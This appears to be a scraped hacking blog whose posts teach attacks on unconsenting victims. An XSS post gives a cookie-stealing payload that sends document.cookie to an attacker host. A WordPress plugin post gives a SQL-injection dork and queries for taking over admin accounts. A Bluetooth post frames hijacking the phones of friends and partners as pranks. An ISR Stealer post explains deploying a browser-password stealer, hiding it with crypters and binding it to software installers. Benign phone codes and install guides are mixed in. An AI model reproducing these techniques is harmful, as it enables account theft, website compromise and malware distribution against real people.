C-T-H

Tuesday

// // Leave a Comment

How to hack a website using Cross site scripting (XSS)

What is  Cross site scripting :-



As quoted in wiky
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."


There is no single, standardized classification of cross-site scripting flaws. but most 
experts distinguish between at least two primary flavors of XSS non-persistent
and persistent to know whats persistent and non persistent click here


In this tutorial i will explain about  Non-Persitent attack 

First of all you must find a vulnerable site .

How To Find Vulnerable Websites ?


  •  Google Hacking
  •  Using  web vulnerability scanners

Google hacking :-
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling any site and launching the Google Hacking Database queries directly onto the crawled content.

Update:- To learn google hacking you can download  
Google Hacking for Penetration Testers book & Password from Here



Web Vulnerability Scanners:
A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses. There are a number of types of vulnerability scanners available today, distinguished from one another by a focus on particular targets. While functionality varies between different types of vulnerability scanners, they share a common, core purpose of enumerating the vulnerabilities present in one or more targets. Vulnerability scanners are a core technology component of vulnerability management.

To Download Acunetix Web Vulnerability Scanner follow the given steps below

 1. First Download Acunetix Web Vulnerability  Scanner  including  Crack  from Here

 2. To get the password Click Here


After finding  a site enter a simple java script given bellow in the serch box or url bar
<SCRIPT>alert("XSS testing by ComeToHack.com");

 If a dialog box  pops up as shown then the site it is vulnerable to xss

In the above example we added a harmless alert dialog box
In the next example i will show you how we can add  more sophisticated and
dangours XSS attack to exploit users
One typical example is a simple cookie theft exploit
.

 var+img=new+Image();img.src= "http://hacker/"%20+%20                            document.cookie;

The previous JavaScript creates an image DOM object.



var img=new Image();



Since the JavaScript code executed within the http://victim/ context, it has access to the cookies

The image object is then redirected to hackers website where the victim cookies are stored


img.src="http://hacker/"%20+%20document.cookie;


Once the hacker has completed his exploit code, which looks like

http://victim/ context=">">+var+img=new+Image();img.src= "http://hacker/document.cookie;



Now the hacker will advertise this specially crafted link through spam e-mail , message board posts, Instant Message (IM)messages, and others, trying to attract user clicks. What makes this attack so effective is that
Users are more likely to click on the link because the URL contains the real Web site domain name, rather than a look-alike domain name address as in normal phishing

Hope you liked this post if you have any doubts please be free to comment

Read More
// // 1 comment

How to Hack Any Computer / Victim PC with IP


Computer Hacking is the most famous work of Hackers, Hackers got ip & play with victim easily even victim did not know what is doing hell with his Computer. Normal PC Users did not know about any security & large numbers of computer users didn't know anything about their Computer Security. ComeToHack.com Present you an easy Tutorial about How to Hack any Computer / Target computer with only IP in few simple steps. But with the help of the Metasploit feature you can even fully control his entire network or computer by just having his/her computer's IP address . Generally Hacking is the term that refers to gaining access to someone's Computer without permissions or interest.

There are some Keywords which use too much on Google for finding this method 

  • hack computer with ip address
  • hack computer with ip address command prompt
  • hack into computer with ip address
  • how to hack someones computer with their ip address
  • hack ip address using command prompt
  • how to hack a computer on a different network
  • how to hack someone with their ip
  • how to hack into other computers
  • how to hack into someones computer

Steps to Hack IP Address:



1) Prepare the IP address of the Victim. (e.g : 101.23.53.70 )


2) Download and Install Advanced Port Scanner.



3) Open Advanced Port Scanner and Type the IP Address in the right column and Click Scan.
4) It will lists you all Opened Ports of the Victim’s PC or Router. (e.g : Port 91 )
 
5) After retrieving the IP address and the Opened Ports of the Victim, Open Command Prompt (CMD)
 
and Type: telnet [IP ADDRESS] [PORT]
 
e.g : telnet 101.23.53.70  91
 
6) Now you’ll be asked to Enter Login Information, Just type Username and Password and hit Enter.
If no password is used just type the Username.

Done! Now you’ll get access to all Victim’s Files and Documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks.)


Enjoy :)
Any questions comment here.
Read More

Monday

// // Leave a Comment

How to hack a wordpress site using SQLi injection

What is Wordpress??


WordPress is a free and open source blogging tool and a content management syste (CMS) based on PHP and MySQL. It has many features including a plug-in architecture and a template system.
WordPress is currently the most popular blogging system in use on the
Web.It was first released on May 27, 2003, by founders Matt Mullenweg.


Now lets move on to a hacking website.I have used here all-video-gallery(WordPress plugin) Sqli Vulnerability..
1>First we will find a Target using a Google dork

inurl:all-video-gallery/config.php?vid=




http://www.ComeToHack.com/

Open New Tab image for better preview.......




2>Open any website.... In my case its juangrial.com.

http://www.ComeToHack.com/







  • Now lets do a sql injection....copy the exploit code then hit enter then see the Magic...Smile



http://www.cometohack.com/



Exploit Code for finding username & password:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--



http://www.cometohack.com/



You can also try this.......well Both will work the same.........


Exploit Code for finding username & email:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users-




-http://www.cometohack.com/


4>We Got admin Email......Now Let!s reset it.....



http://www.cometohack.com/



For that GO to:- http://site.com/wp-admin OR https://site.com/wp-login.php


"Then click on Lost Password"



http://www.cometohack.com/


5>Enter the Email we Got IN earlier steps...



http://www.cometohack.com/



http://www.cometohack.com/



6>Now come back and go to activation table....

* Exploit Code for activation Key:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--




http://www.cometohack.com/

7>yeah!!!we got what we need now lets change the admin password...


goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username




http://www.cometohack.com/



http://www.cometohack.com/


http://www.cometohack.com/




8> Now open http://site.com/wp-admin




and Login with new password..........xD




http://www.cometohack.com/


Read More

Friday

// // 1 comment

How to Make Single Name on Facebook Profile / Timeline


h

In World Facebook is Now biggest social Media.Today Technoraise sharing you amazing trick Make Single Name Account On Facebook.
Note:-This Trick is Only Work On Mozila FireFox if u dnt have Mozila Fire Fox Then Dowanload From here latest Version.
Dowanlaod
Firstly Change your Browser Proxy Manually use one of the proxy from below given.
Http Proxies
119.252.160.34
202.43.188.143
118.98.35.251
36.76.182.173
61.247.45.35
180.250.169.14
180.250.82.188
119.252.160.34
219.83.100.195
110.139.125.230
202.87.254.156  
PORT:-8080
Now Save Your Setting
Now Open your Facebook Account  Name Settings.
Change your language from English (us) to Bahasa Indonesia
Then  Simply remove Your Last Name And Save it.
Now Your Facebook Account is only with First Name Without Last Name.
After Completing all steps remove Manual Proxy and select  use system proxy settings and change change
your language back to English (us).
Take a look on all steps as shown below

http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com
http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com

http://newblogspotblogs.blogspot.com

If You are facing any problem in make single name account on facebook then must comment below 
regard Technoraise keep visiting and keep sharing thanks :)

Read More

Monday

// // Leave a Comment

Learn All Mobiles Hacking Tips Tricks Cheats Step by Step




Here is a list of what you can do when you have hacked the other phone. Have Fun!

  •     Read Messages. (They are no more personal!)
  •     Read Contacts. (Check your lover’s phone book to see what name he/she has saved your name. Hey, please don’t suicide when you see he/she has saved your number as lover no. 9! HeHe)
  •     Change Profile (Change the other’s profile to silent mode when you are on a date!)
  •     Play Ring tone even if the phone is silent (Annoy your classmates!)
  •     Play songs from the hacked phone in the same phone.
  •     Restart the phone (Show some magic to your friends!)
  •     Switch off the phone (Ultimate thing that you can do!)
  •     Restore Factory Settings (Do this to the most organized one and run away quickly!)
  •     Change Ringing Volume (You have enough experience how to use it. Don’t you?)




Follow these steps to hack any Blue tooth enabled mobile phone.

    Download Super Blue tooth Hack 1.8 and also check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it in your mobile.
    There is no need to install the software in the mobile which you want to hack.
    Turn on the Blue tooth of your handset and open the Super Blue tooth Hack Application.
    Select the connect option and then Enquiry Devices to search for any of mobile that has its Blue tooth turned on nearby.
    Your friend’s Blue tooth must also be turned on to be found. Pairing between the devices is also necessary sometimes.
    Once your friend’s phone has been found, try out its functions!
   
   
  •  Nokia Mobile (Symbian / Android) press (*#9990#) , Now your Blue tooth will always active until your mobile can't restart .

How to disable a STOLEN mobile phone?

To check your Mobile phone's serial number, key in the following digits on your phone:
*#06#
A 15 digit code will appear on the screen.
This number is unique to your
... handset. Write it down and keep it somewhere safe. when your phone get stolen, you can phone your service provider
and give them this code.
They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless.
You probably won't get your phone back,
but at least you know that
whoever stole it can't use/sell it either. If everybody does this, there would be no point in people stealing mobile phone..........


Android Secret Dial Codes List

All the codes are listed below. To use, simply go to your phone app and dial these codes.

  • *#*#4636#*#* – Phone Information (allowsyou to change the SMSservice centrenumber and more)
  • *2767*3855# – Factory Reset Phone
  • *#*#34971539#*#* – Shows completes information about the camera
  • *#*#7594#*#* – Changing the power button behavior – Enables direct power off once the code enabled
  • *#*#273283*255*663282*#*#* – For a quick backup to all your media files
  • *#*#197328640#*#* – Enabling test mode for service activity
  • *#*#232339#*#* or *#*#526#*#* or *#*#528#*#* – Wireless LAN Tests
  • *#*#232338#*#* – Displays Wi-Fi Mac- address
  • *#*#1472365#*#* – For a quick GPS test
  • *#*#1575#*#* – A Different type GPS test
  • *#*#0283#*#* – Packet Loopback test
  • *#*#0*#*#* – LCD display test
  • *#*#0673#*#* or *#*#0289#*#* – Audio test
  • *#*#0842#*#* – Vibration and Backlight test
    • *#*#2663#*#* – Displays touch-screen version
    • *#*#2664#*#* – Touch-Screen test
    • *#*#0588#*#* – Proximity sensor test
    • *#*#3264#*#* – Ram version
    • *#*#232331#*#* – Bluetooth test
    • *#*#7262626#*#* – Field test
    • *#*#232337#*#* – Displays bluetooth device address
    • *#*#8255#*#* – For Google Talk service monitoring
    • *#*#4986*2650468#*#* – PDA, Phone, Hardware, RF Call Date firmware info
    • *#*#1234#*#* – PDA and Phone firmware info
    • *#*#1111#*#* – FTA Software version
    • *#*#2222#*#* – FTA Hardware verion
    • *#*#44336#*#* – Displays Build time and change list number
    • *#06# – Displays IMEI number
    • *#*#8351#*#* – Enables voice dialing logging mode
    • *#*#8350#*#* – Disables voice dialing logging mode
    • **05***# – Execute from Emergency dial screen to unlock PUK code



Secret Code For Nokia


Codes :
  • *#06# For checking IMEI(international Mobile Equipment Identity)
  •  *#7780# Reset to factory settings
  • *#0000# To view software version
  • *#2820# Bluetooth device address
  • *#746025625# Sim clock allowed status
  • #pw+1234567890+1# Shows if ur sim as any restrictions
  • *3370# This Nokia code activates Enhanced Full Rate Codec (EFR) - Your Nokia cell phone uses the best sound quality but talk time is reduced my approx. 5%   
  • #3370# Deactivate Enhanced Full Rate Codec (EFR) .   
  • *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.   
  • *#4720# With this Nokia code you can deactivate the Half Rate Codec.    
  • *#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release   
  • *#9999# Phones software version if *#0000# does not work.   
  • *#06# For checking the International Mobile Equipment Identity (IMEI Number) .
  •     #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
  •     #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols) .
  •     #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
  •     #pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols) .
  •     *#147# This lets you know who called you last (Only vodofone).
  •     *#1471# Last call (Only vodofone) .
  •     *#21# This phone code allows you to check the number that "All Calls" are diverted to.
  •     *#2640# Displays phone security code in use .
  •     *#30# Lets you see the private number.
  •     *#43# Allows you to check the "Call Waiting" status of your cell phone.
  •     *#61# Allows you to check the number that "On No Reply" calls are diverted to .
  •     *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to .
  •     *#67# Allows you to check the number that "On Busy Calls" are diverted to
  •     *#67705646# Phone code that removes operator logo on 3310 & 3330
  •     *#73# Reset phone timers and game scores.
  •     *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM 
  •  
Clock Stop Allowed", it means you will get the best standby time possible .
  •     *#7760# Manufactures code.
  •     *#7780# Restore factory settings.
  •     *#8110# Software version for the nokia 8110.
  •     *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again.
  •     *#94870345123456789# Deactivate the PWM-Mem.
  •     **21*number# Turn on "All Calls" diverting to the phone number entered.
  •     **61*number# Turn on "No Reply" diverting to the phone number entered .
  •     **67*number# Turn on "On Busy" diverting to the phone number entered .
  •     12345 This is the default security code .
    press and hold # Lets you switch between lines.



Read More

Thursday

// // Leave a Comment

How To Install Backtrack 5 r3 on Windows 7 Step by Step Tutorial

Backtrack 5 r3 is an operating system (OS) program that we run / install on our computers for operate new functions / programs. Backtrack is Linux type new version operating system that help to check security or pentesting. Backtrack is an favorite operating system of Hackers. Today I'm going to share with you to
How to install / run Backtack 5  on Windows through Virtual Machine step by step guideline
Step 1 :
Requirements

Step 2 :



Installation
                                   There we are going to start basic Backtrack OS , you've to downloaded Backtrack & also have a minimum 2 GB Ram in your computer. Hard disk space minimum requirement is only 20 GB show as a partition . Now 1st install Vmware in your computer then we will go to start installing Backtrack 5 r3 in your computer.


1 : After installing Vmware / Vmplayer now create a new Virtual Machine. The showing pictures below will help you in installing step by step. Slect Typical (recommended) & click on Next button ...

  
 

2 :  After click on Next new window will open there Choose installer ISO (Choose Backtrack-5 ISO)  & Click Open , as showing below











3 :  After click on Open next step will open, there Choose Linux as your Guest Operating System type & Ubuntu as version then click on NExt







4 : After selecting Operating system & version now give a name & location of your BackTrack VM  then click Next to go to next step







4 :  Specify virtual hard drive space (20 GB is good enough) . That is minimum requirement . Then click on Next ...







5 : Now final step is there. Now click Finish from ready to create new VM Window.







6 :  A Black window will appear there, now hit enter to go boot screen then choose default boot text mode and hit enter (just press single enter button)






7 :  Now a Backtrack window will show there, just hit enter at the point that is (Defauld Boot Text Mode)







8 : Type    Startx   to start GUI (x server)
Click to install Backtrack icon or open terminal type  sh -c "ubiquity"







9 :  Continue like normal installation choose keyboard type and provide location info .
        If you are installing just Backtrack then go Normally and erase and use entire disk  or if you installing Backtrack with other OS then specify partition accordingly (i'm using virtual hard drive)







10 :  Now Click forward and click on install






11 :  Wait until it finished installing 
                     It will take up to 30 minutes depend on your system ...






 And finally we install Backtrack , now restart your vm & Enjoy BackTrack 5 on Windows.

After installing Backtrack on your windows system 1st check this tutorial just to know :
How to Hack any Gmail & Facebook Account step by step guideline 
& enjoy Hacking on Backtrack :)

Read More

Friday

// // Leave a Comment

ISR Stealer Latest Version Password Hacking Tool Free Download [Tutorial]

Any type of User Account Hacking is now growing up very fast. Keylogers tools made for getting logs but hackers use them illegal. Today we are going to highlight the Hacking through Stealer.

What is Stealer?
Stealer is basically used for steal the saved cookies in browsers. It only steal the saved Passwords in browsers eg.IE, chrome, Firefox, And any Messengers.




What is ISR Stealer :

Made in: Romania, Europe
Release date: 27.02.2012
Gfx by: Y.xakep and Tinkode
Beta testers : linuxgirl, zippy and wav3
Updated: 10.03.2012
Developed for: InSecurity.Ro

Now here we go to start Browsers saved password through ISR Stealer.
Requirement:
  • Most Important *Brain 
  • Hosting
  • Domain
  • Binders
  • MySql Database
 Just start Tutorial ISR Stealer step by step Password Hacking method easy
Open a hosting provider website. We use there 000WebHost.com ...

Open Sign Up there, if already have account then just Log in as showing below picture.

Note: For Viewing Big size Picture just Save Picture in you Computer.

http://www.ComeToHack.com/


After Login Click on your Control Panel (CP) as showing below picture


http://www.ComeToHack.com/

New web page will appear there as Control Panel. Just click on MySql for next step.


www.cometohack.com/2012/12/best-cookies-stealing.html

The new webpage will open & now you will create your own new MySql Database.

I'll suggest you that the name you put on 1st option , you have to write there (db) .
& 2nd Option you've to write Admin / Author
& Last one type there your Password. Then next step ...

http://www.cometohack.com/2013/09/how-to-hack-any-gmail-facebook-account.html


Now open that Folder where you've to saved ISR Stealer downloaded . There will be a folder named by (PHP) open & open there file (config.php) in NotePad.
Now type there your Database user name & your own login User + Password.

http://www.cometohack.com/2013/10/how-to-hack-website-learn-hacking-iis.html


After saving your info in Config.php file save as same & select all to get them in single Archive. Just Like this:


http://cometohack.com/2013/03/learn-hacking-step-by-step-how-to.html


& Now next step is go to Control Panel & Click on File Manager.


http://cometohack.com/2013/06/windows-8-updates-tips-and-tricks.html
After clicking on File Manager new Webpage will appear (just showing below picture). Now click on Upload Button & there will open a new webpage that is our next step.


http://cometohack.com/2013/05/submit-blogger-sitemap-to-google.html


Now select all files in PHP Folder & click Check Green button for Save & proceed to next step.

http://cometohack.com/2013/05/mobilink-jazz-tips-and-tricks-free-call.html


Select all files or that Archive folder for uploading & going to next step...


http://newtopsoftware.blogspot.com/2013/10/grand-theft-auto-vice-city-free.html


That Green Button is showing for proceed or saved or Next option.



All the files are saved in your File Manager & now Remove the (install.php) folder from the File Manager where others showing like index.php or others.....

http://newtopsoftware.blogspot.com/2013/10/grand-theft-auto-vice-city-free.html


There is the picture to showing the Install.php Deleting option.


http://cometohack.com/2013/04/eset-smart-security-latest-updated-full.html


Now check on Index.php & Click on Open . Now your domain will open with new webpage.


http://www.cometohack.com/2013/09/how-to-hack-any-gmail-facebook-account.html



Now Open ISR Stealer save & download already in your Computer.


http://www.cometohack.com/2013/09/how-to-hack-any-gmail-facebook-account.html



The ISR Stealer will open like this Green showing picture.


http://www.cometohack.com/2012/12/hack-forum-through-mysql.html



Just use there Your Domain Name (http://www.host.com/index.php)  & Check (Test PHP) .
The checking result will show you as that Done. it is working !!

http://www.cometohack.com/2012/12/alexa-booster-34.html


Now you may build your own Build Server for Publish or sending your victim for attack.  After opening your server file victim all broweser's saved password will show in logs at your domain. Just login in your domain & get logs.



http://www.ComeToHack.com/


One more suggestion for this Server file. All antivirus will detect this file & file will remove, you've to use Crypters & binder for the safe hacking. With the help of Crypter, victim's antivirus will not detect any virus & binder will help you to save your file behind the any software program that should be Antivirus setup or Microsoft Office setup or any other programs that we use regularly in our computers.

Thanks to be here & learn more visit our community & Froum  for more just share your experience please comment & suggest more to the Public .


http://adf.ly/Yd9f7

Read More

Earn 25$ Instant